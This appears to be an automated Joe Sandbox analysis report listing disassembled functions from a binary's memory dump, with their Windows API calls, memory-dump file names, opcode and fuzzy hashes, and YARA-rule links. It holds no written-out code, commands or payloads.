                                                                                                                                                          • Opcode ID: 602310f5b812775dffc735196e8db4ac0d79262d9d91e2e282ee6f50c34b0924
                                                                                                                                                          • Instruction ID: d19679f94fc05081dd55a94453841e083ca304283c3ebba6a7ac5471bd460768
                                                                                                                                                          • Opcode Fuzzy Hash: 602310f5b812775dffc735196e8db4ac0d79262d9d91e2e282ee6f50c34b0924
                                                                                                                                                          • Instruction Fuzzy Hash: 24B16B7990024ADBDF14CFA8C5807EDB7B1FF08310F15956AEC59EB654EB30AA40CBA4
                                                                                                                                                          Function 00169569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove$__itow__swprintf
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3253778849-0
                                                                                                                                                          • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                                          • Instruction ID: 174d09312c84b5bd04507a639a6014aea54998aaebf2c9ccd14837b4639c9867
                                                                                                                                                          • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                                          • Instruction Fuzzy Hash: 5061D23050025A9FDF05EF60CC91EFE77A9AF24308F044559F95A6B2A2EB34DD25CB51
                                                                                                                                                          Function 00181AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00181B09
                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00181B17
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00181B45
                                                                                                                                                            • Part of subcall function 0014297D: __wsplitpath_helper.LIBCMT ref: 001429BD
                                                                                                                                                          • _wcscat.LIBCMT ref: 00181B5A
                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00181BD0
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00181BE2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1380811348-0
                                                                                                                                                          • Opcode ID: fdb67e38f7fb0f9ef010cc1ce86bf55f88b5dbf4425336748cdd5c3dbe22f241
                                                                                                                                                          • Instruction ID: b78d63bf0011ceb09c6cb81f65410b00bb5ce4b3e4128db461fc9213e16321b1
                                                                                                                                                          • Opcode Fuzzy Hash: fdb67e38f7fb0f9ef010cc1ce86bf55f88b5dbf4425336748cdd5c3dbe22f241
                                                                                                                                                          • Instruction Fuzzy Hash: 74518072504310AFD710EF24D885EABB7ECEF98754F00491EF58697251EB30EA45CB92
                                                                                                                                                          Function 0013DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscpy$_wcscat
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2037614760-0
                                                                                                                                                          • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                          • Instruction ID: d6d601282f81edaf29b8e98f99742317a7d7eaa3c60d6d0ae4243b18e20d4236
                                                                                                                                                          • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                          • Instruction Fuzzy Hash: 70511030914225AECF25AF98F4419BDB7B1FF14311F50904EF581AB292DBB49F82D791
                                                                                                                                                          Function 00162ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00162AF6
                                                                                                                                                          • VariantClear.OLEAUT32(00000013), ref: 00162B68
                                                                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 00162BC3
                                                                                                                                                          • _memmove.LIBCMT ref: 00162BED
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00162C3A
                                                                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00162C68
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1101466143-0
                                                                                                                                                          • Opcode ID: 43e09b0672403de8dd8f5db0459929b039bd13ac5a4925767a007e510e3a9f0a
                                                                                                                                                          • Instruction ID: 1e502268ef26f0483bfab825f32c14c290fe67054fd83c5924c58585edfc0d7e
                                                                                                                                                          • Opcode Fuzzy Hash: 43e09b0672403de8dd8f5db0459929b039bd13ac5a4925767a007e510e3a9f0a
                                                                                                                                                          • Instruction Fuzzy Hash: 945178B5A00609EFDB24CF58C880EAAB7B8FF4C314B158559E959DB310E730EA51CFA0
                                                                                                                                                          Function 001882DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetMenu.USER32(?), ref: 0018833D
                                                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 00188374
                                                                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0018839C
                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 0018840B
                                                                                                                                                          • GetSubMenu.USER32(?,?), ref: 00188419
                                                                                                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0018846A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 650687236-0
                                                                                                                                                          • Opcode ID: 2d45915b9b7771940b084d9f167e8af710bd7173b7c3a952468797e81d47e778
                                                                                                                                                          • Instruction ID: eab400d41e3db98ed6802e7188c9480d53fc5077ad97c3b3405d55fe8ee47f86
                                                                                                                                                          • Opcode Fuzzy Hash: 2d45915b9b7771940b084d9f167e8af710bd7173b7c3a952468797e81d47e778
                                                                                                                                                          • Instruction Fuzzy Hash: D3517B76A00625EFCB01EFA8D841AAEB7B4FF58710F118459E916BB351DB30AE418F90
                                                                                                                                                          Function 0017936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00179409
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 00179416
                                                                                                                                                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0017943A
                                                                                                                                                          • _strlen.LIBCMT ref: 00179484
                                                                                                                                                          • _memmove.LIBCMT ref: 001794CA
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 001794F7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2795762555-0
                                                                                                                                                          • Opcode ID: 4baad2bcc5e1c778c696de8f0e218ab366b15e9450f6dd86b48901e8d0c58754
                                                                                                                                                          • Instruction ID: ea6588463c1e84135d072416179cf7fe3e8c168264f5d589b245c0ad22d74eb1
                                                                                                                                                          • Opcode Fuzzy Hash: 4baad2bcc5e1c778c696de8f0e218ab366b15e9450f6dd86b48901e8d0c58754
                                                                                                                                                          • Instruction Fuzzy Hash: CD419175600108AFCB18EBA4DD85EAEB7B9EF58314F108169F51A972D1EB30AE45CB60
                                                                                                                                                          Function 001654E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 0016552E
                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00165579
                                                                                                                                                          • IsMenu.USER32(00000000), ref: 00165599
                                                                                                                                                          • CreatePopupMenu.USER32 ref: 001655CD
                                                                                                                                                          • GetMenuItemCount.USER32(000000FF), ref: 0016562B
                                                                                                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0016565C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3311875123-0
                                                                                                                                                          • Opcode ID: f50705fdac22b84007e2d6ca098b5f4bdc181e24cc413bc6ff4e345fe8c018a6
                                                                                                                                                          • Instruction ID: 8048752fc7d3088602920e2ecd911b5830c02de363d6b8c05d9713cb2b480e96
                                                                                                                                                          • Opcode Fuzzy Hash: f50705fdac22b84007e2d6ca098b5f4bdc181e24cc413bc6ff4e345fe8c018a6
                                                                                                                                                          • Instruction Fuzzy Hash: 4D51F370A00B49EFDF24CF68CC88BADBBF6BF15318F544119E4569B290E3B09964CB51
                                                                                                                                                          Function 0013B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0013B1C1
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0013B225
                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 0013B242
                                                                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0013B253
                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0013B29D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1827037458-0
                                                                                                                                                          • Opcode ID: b0691ce478b802b5ed327714ae24abd24119ba83ab32311ae1feb6fecc0bfda4
                                                                                                                                                          • Instruction ID: 209d9ec0b6dd18d5b2a3675e9887915295528897bc5ccb7b5411c6422200386d
                                                                                                                                                          • Opcode Fuzzy Hash: b0691ce478b802b5ed327714ae24abd24119ba83ab32311ae1feb6fecc0bfda4
                                                                                                                                                          • Instruction Fuzzy Hash: CA41AF70104700AFDB11DF64DCC4FAA7BE8EB56320F040669FAA5C76A1D731A885DB62
                                                                                                                                                          Function 0018E1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ShowWindow.USER32(001E1810,00000000,?,?,001E1810,001E1810,?,0019E2D6), ref: 0018E21B
                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 0018E23F
                                                                                                                                                          • ShowWindow.USER32(001E1810,00000000,?,?,001E1810,001E1810,?,0019E2D6), ref: 0018E29F
                                                                                                                                                          • ShowWindow.USER32(?,00000004,?,?,001E1810,001E1810,?,0019E2D6), ref: 0018E2B1
                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 0018E2D5
                                                                                                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0018E2F8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 642888154-0
                                                                                                                                                          • Opcode ID: 7a49798010087443a9e3eded4bc7826c2ce7b9a385cbf13e37fe4c8be8d58e78
                                                                                                                                                          • Instruction ID: 9997b909ff0a227be6349da8b3beb4fe3bc888dcefea318e6d7c18e5e5b599ed
                                                                                                                                                          • Opcode Fuzzy Hash: 7a49798010087443a9e3eded4bc7826c2ce7b9a385cbf13e37fe4c8be8d58e78
                                                                                                                                                          • Instruction Fuzzy Hash: 65418E34600545EFDB26EF28C499B947BF6BF0A304F1841B9FA598F6A2C732A941CF51
                                                                                                                                                          Function 00171BFA Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 308COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                            • Part of subcall function 00123BCF: _wcscpy.LIBCMT ref: 00123BF2
                                                                                                                                                          • _wcstok.LIBCMT ref: 00171D6E
                                                                                                                                                          • _wcscpy.LIBCMT ref: 00171DFD
                                                                                                                                                          • _memset.LIBCMT ref: 00171E30
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                          • String ID: X
                                                                                                                                                          • API String ID: 774024439-3081909835
                                                                                                                                                          • Opcode ID: c1055990219fc72d92a8ef1e8d4d366e67470399147f54854990d0d5cadf9012
                                                                                                                                                          • Instruction ID: 59c8d12f4e08828d1ba3cba2846637568162bb74aeb5e3815e6fe3b8edd8d67b
                                                                                                                                                          • Opcode Fuzzy Hash: c1055990219fc72d92a8ef1e8d4d366e67470399147f54854990d0d5cadf9012
                                                                                                                                                          • Instruction Fuzzy Hash: 1CC18031508310AFC714EF28D991A5EB7F4BF95310F00892DF99A972A2EB30ED55CB92
                                                                                                                                                          Function 0018E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0013B5EB
                                                                                                                                                            • Part of subcall function 0013B58B: SelectObject.GDI32(?,00000000), ref: 0013B5FA
                                                                                                                                                            • Part of subcall function 0013B58B: BeginPath.GDI32(?), ref: 0013B611
                                                                                                                                                            • Part of subcall function 0013B58B: SelectObject.GDI32(?,00000000), ref: 0013B63B
                                                                                                                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0018E9F2
                                                                                                                                                          • LineTo.GDI32(00000000,00000003,?), ref: 0018EA06
